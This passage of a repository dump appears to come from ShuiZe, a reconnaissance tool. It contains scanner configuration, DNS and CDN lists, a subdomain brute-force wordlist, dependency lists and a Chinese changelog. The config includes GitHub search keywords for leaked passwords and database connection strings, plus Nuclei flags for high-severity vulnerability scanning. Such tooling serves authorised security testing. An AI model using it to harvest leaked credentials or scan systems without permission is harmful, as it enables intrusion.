30 | [censys api]
31 | UID =
32 | SECRET =
33 |
34 | [web ports]
35 | web_ports = ['80-90', 443, 7001, 8000, 8008, 8009, 8080, 8081, 8088, 8090, 8099, 8443, 8800, 8880, 8888, 9000, 9090]
36 |
37 | [service ports dict]
38 | service_ports_dict = {'389': 'ldaps', '1099': 'rmi', '1090': 'rmi', '6379': 'redis', '8000': 'jdwp', '9200': 'elastic', '27017': 'mongodb', '2181': 'zookeeper', '22': 'ssh', '21': 'ftp', '1433': 'mssql', '3306': 'mysql', '3389': 'rdp'}
39 |
40 | [github keywords]
41 | github_keywords = ['jdbc:', 'password', 'username', 'database', 'smtp', 'vpn', 'pwd', 'passwd', 'connect']
42 |
43 | [nuclei config]
44 | nuclei_config = -rl 300 -c 50 -timeout 5 -stats -silent -severity critical,high -as
45 |
46 | # 快代理的配置,使用快代理时,根据自己购买的配置设置线程数目,switch是开关,on为使用快代理,off为不使用
47 | [kuaidaili]
48 | tunnel = xxxx.kdltps.com:15818
49 | username = xxxxxxxxx
50 | password = xxxxxxxxx
51 | thread_num = 5
52 | switch = off
--------------------------------------------------------------------------------
/iniFile/dict/dns_servers.txt:
--------------------------------------------------------------------------------
1 | 119.29.29.29
2 | 182.254.116.116
3 | # 223.5.5.5
4 | # 223.6.6.6
5 | 114.114.115.115
6 | 114.114.114.114
7 |
--------------------------------------------------------------------------------
/iniFile/dict/next_sub.txt:
--------------------------------------------------------------------------------
1 | test
2 | test2
3 | t
4 | dev
5 | 1
6 | 2
7 | 3
8 | s1
9 | s2
10 | s3
11 | admin
12 | adm
13 | a
14 | ht
15 | adminht
16 | webht
17 | web
18 | gm
19 | sys
20 | system
21 | manage
22 | manager
23 | mgr
24 | b
25 | c
26 | passport
27 | bata
28 | wei
29 | weixin
30 | wechat
31 | wx
32 | wiki
33 | upload
34 | ftp
35 | pic
36 | jira
37 | zabbix
38 | nagios
39 | bug
40 | bugzilla
41 | sql
42 | mysql
43 | db
44 | stmp
45 | pop
46 | imap
47 | mail
48 | zimbra
49 | exchange
50 | forum
51 | bbs
52 | list
53 | count
54 | counter
55 | img
56 | img01
57 | img02
58 | img03
59 | img04
60 | api
61 | cache
62 | js
63 | css
64 | app
65 | apps
66 | wap
67 | m
68 | sms
69 | zip
70 | monitor
71 | proxy
72 | update
73 | upgrade
74 | stat
75 | stats
76 | data
77 | portal
78 | blog
79 | autodiscover
80 | en
81 | search
82 | so
83 | oa
84 | database
85 | home
86 | sso
87 | help
88 | vip
89 | s
90 | w
91 | down
92 | download
93 | downloads
94 | dl
95 | svn
96 | git
97 | log
98 | staff
99 | vpn
100 | sslvpn
101 | ssh
102 | scanner
103 | sandbox
104 | ldap
105 | lab
106 | go
107 | demo
108 | console
109 | cms
110 | auth
111 | crm
112 | erp
113 | res
114 | static
115 | old
116 | new
117 | beta
118 | image
119 | service
120 | login
121 | 3g
122 | docs
123 | it
124 | e
125 | live
126 | library
127 | files
128 | i
129 | d
130 | cp
131 | connect
132 | gateway
133 | lib
134 | preview
135 | backup
136 | share
137 | status
138 | assets
139 | user
140 | vote
141 | bugs
142 | cas
143 | feedback
144 | id
145 | edm
146 | survey
147 | union
148 | ceshi
149 | dev1
150 | updates
151 | phpmyadmin
152 | pma
153 | edit
154 | master
155 | xml
156 | control
157 | profile
158 | zhidao
159 | tool
160 | toolbox
161 | boss
162 | activity
163 | www
164 |
--------------------------------------------------------------------------------
/iniFile/dict/subnames_all_5_letters.txt:
--------------------------------------------------------------------------------
1 | {alphnum}
2 | {alphnum}{alphnum}
3 | {alphnum}{alphnum}{alphnum}
4 | {alphnum}{alphnum}{alphnum}{alphnum}
5 | {alphnum}{alphnum}{alphnum}{alphnum}{alphnum}
--------------------------------------------------------------------------------
/iniFile/subdomain3/cdn_servers.txt:
--------------------------------------------------------------------------------
1 | chinacache.net
2 | lxdns.com
3 | fastcdn.cn
4 | globalcdn.cn
5 | lxcdn.com
6 | aicdn.com
7 | cdn20.com
8 | fastwebcdn.com
9 | cloudcdn.net
10 | akamai-staging.net
11 | akamaized.net
12 | akamai.net
13 | cloudfront.net
14 | amazonaws.com
15 | azioncdn.net
16 | cachefly.net
17 | cdn77.net
18 | cdn77.org
19 | cdnetworks.com
20 | gccdn.net
21 | cdnify.io
22 | cdnsun.net
23 | cdnvideo.ru
24 | wscloudcdn.com
25 | edgecastcdn.net
26 | fastly.net
27 | qianxun.com
28 | hwcdn.net
29 | incapdns.net
30 | internapcdn.net
31 | jdcdn.com
32 | kxcdn.com
33 | Leaseweb
34 | lswcdn.net
35 | fpbns.net.
36 | footprint.net
37 | llnwd.net
38 | netdna-cdn.com
39 | ngenix.net
40 | ccgslb.com.cn
41 | mwcloudcdn.com
42 | speedcdns.com
43 | skyparkcdn.net
44 | ourglb0.com
45 | bitgravity.com
46 | azureedge.net
47 | anankecdn.com.br
48 | presscdn.com
49 | telefonica.com
50 | alikunlun.com
51 | ourwebcdn.com
52 | aliyuncs.com
53 | aliyun-inc.com
54 | cdn.dnsv1.com
55 | cdntip.com
56 | alicdn.com
57 | cdn20.info
58 | acadn.com
59 | fastcdn.com
60 | tcdn.qq.com
61 | dayugslb.com
--------------------------------------------------------------------------------
/iniFile/subdomain3/name_servers.txt:
--------------------------------------------------------------------------------
1 | 114.114.114.114
2 | 114.114.115.115
3 | 223.5.5.5
4 | 223.6.6.6
5 | 180.76.76.76
6 | 119.29.29.29
7 | 182.254.116.116
8 | 210.2.4.8
9 | 112.124.47.27
10 | 114.215.126.16
11 | 101.226.4.6
12 | 218.30.118.6
13 | 8.8.8.8
14 | 8.8.4.4
--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
1 | openpyxl
2 | aiodns
3 | aiohttp
4 | aiosqlite
5 | altgraph
6 | async-timeout
7 | attrs
8 | bcrypt
9 | beautifulsoup4
10 | bs4
11 | certifi
12 | cffi
13 | chardet
14 | Click
15 | click-plugins
16 | cloudscraper
17 | colorama
18 | cryptography
19 | Cython
20 | dnslib
21 | dnspython
22 | elasticsearch
23 | et-xmlfile
24 | Flask
25 | FOFA
26 | geoip2
27 | gevent
28 | google
29 | idna
30 | IPy
31 | itsdangerous
32 | jdcal
33 | Jinja2
34 | kazoo
35 | ldap3
36 | lxml
37 | macholib
38 | MarkupSafe
39 | maxminddb
40 | multidict
41 | netaddr
42 | openpyxl
43 | paramiko
44 | plotly
45 | pyasn1
46 | pycares
47 | pycparser
48 | pycryptodome
49 | PyInstaller
50 | pymongo
51 | PyMySQL
52 | PyNaCl
53 | pyparsing
54 | PySocks
55 | PythonDNS
56 | redis
57 | requests
58 | requests-file
59 | requests-toolbelt
60 | retrying
61 | scapy
62 | shodan
63 | six
64 | soupsieve
65 | termcolor
66 | texttable
67 | tldextract
68 | urllib3
69 | uvloop
70 | Werkzeug
71 | XlsxWriter
72 | xlwt
73 | yarl
74 | PyYAML
75 | tqdm
--------------------------------------------------------------------------------
/requirements2.txt:
--------------------------------------------------------------------------------
1 | openpyxl==2.6.4
2 | aiodns==2.0.0
3 | aiohttp==3.6.2
4 | aiosqlite==0.13.0
5 | altgraph==0.16.1
6 | async-timeout==3.0.1
7 | attrs==20.1.0
8 | bcrypt==3.1.7
9 | beautifulsoup4==4.8.1
10 | bs4==0.0.1
11 | certifi==2019.9.11
12 | cffi==1.13.1
13 | chardet==3.0.4
14 | Click==7.0
15 | click-plugins==1.1.1
16 | cloudscraper==1.2.46
17 | colorama==0.4.1
18 | cryptography==2.8
19 | Cython==0.29.15
20 | dnslib==0.9.10
21 | dnspython==1.16.0
22 | elasticsearch==7.1.0
23 | et-xmlfile==1.0.1
24 | Flask==1.1.1
25 | FOFA==1.0.1
26 | geoip2==4.0.2
27 | gevent
28 | google==2.0.3
29 | idna==2.8
30 | IPy==1.0
31 | itsdangerous==1.1.0
32 | jdcal==1.4.1
33 | Jinja2==2.11.1
34 | kazoo==2.6.1
35 | ldap3==2.6.1
36 | lxml==4.5.1
37 | macholib==1.11
38 | MarkupSafe==1.1.1
39 | maxminddb==2.0.2
40 | multidict==4.7.6
41 | netaddr==0.7.19
42 | openpyxl==2.6.4
43 | paramiko==2.7.1
44 | plotly==4.7.1
45 | pyasn1==0.4.8
46 | pycares==3.1.1
47 | pycparser==2.19
48 | pycryptodome==3.9.2
49 | PyInstaller==3.5
50 | pymongo==3.2
51 | PyMySQL==0.9.3
52 | PyNaCl==1.3.0
53 | pyparsing==2.4.7
54 | PySocks==1.7.1
55 | PythonDNS==0.1
56 | redis==3.3.11
57 | requests==2.24.0
58 | requests-file==1.4.3
59 | requests-toolbelt==0.9.1
60 | retrying==1.3.3
61 | scapy==2.4.3
62 | shodan==1.7.5
63 | six==1.13.0
64 | soupsieve==1.9.5
65 | termcolor==1.1.0
66 | texttable==1.6.2
67 | tldextract==2.2.2
68 | urllib3==1.25.8
69 | uvloop==0.14.0
70 | Werkzeug==1.0.0
71 | XlsxWriter==1.2.5
72 | xlwt==1.3.0
73 | yarl==1.5.1
74 | PyYAML==5.3.1
75 | tqdm==4.51.0
76 |
--------------------------------------------------------------------------------
/versionFlag.txt:
--------------------------------------------------------------------------------
1 | 2021.9.3 增加了confluence指纹
2 | 2021.9.4 更新了爱企查获取目标架构信息,包含【备案信息、对外投资企业、控股公司、分支机构、联系方式、邮箱地址等信息】
3 | 2021.9.5 增加了夸克的api接口:-d -c --fofaTitle中都会调用
4 | 2021.11.30 增加了奇安信hunter的api接口:-d -c --fofaTitle中都会调用
5 | 2022.1.17 修复了certspotter接口获取子域名过滤不严谨的问题
6 | 2022.3.21 更新了fofa api的域名
7 | 2022.3.21 更新了域名备案反查的问题
8 | 2022.3.23 增加了securitytrails接口获取子域名,该接口很强大,建议在config.ini里添加你的api keys
9 | 2022.3.23 修复了爱企查无法获取数据的问题
10 | 2022.7.5 增加Nuclei默认参数配置-as,先进行wappalyzer指纹识别
11 | 2022.8.12 ShuiZe增加Dockerfile安装方式
12 | 2022.8.12 修复了大量反馈aiqicha脚本报错的问题,初步排查是被封IP的原因
13 | 2022.8.12 修复了quakeApi没有title导致报错的情况
14 | 2022.8.20 集成了ObserverWard扫描指纹
--------------------------------------------------------------------------------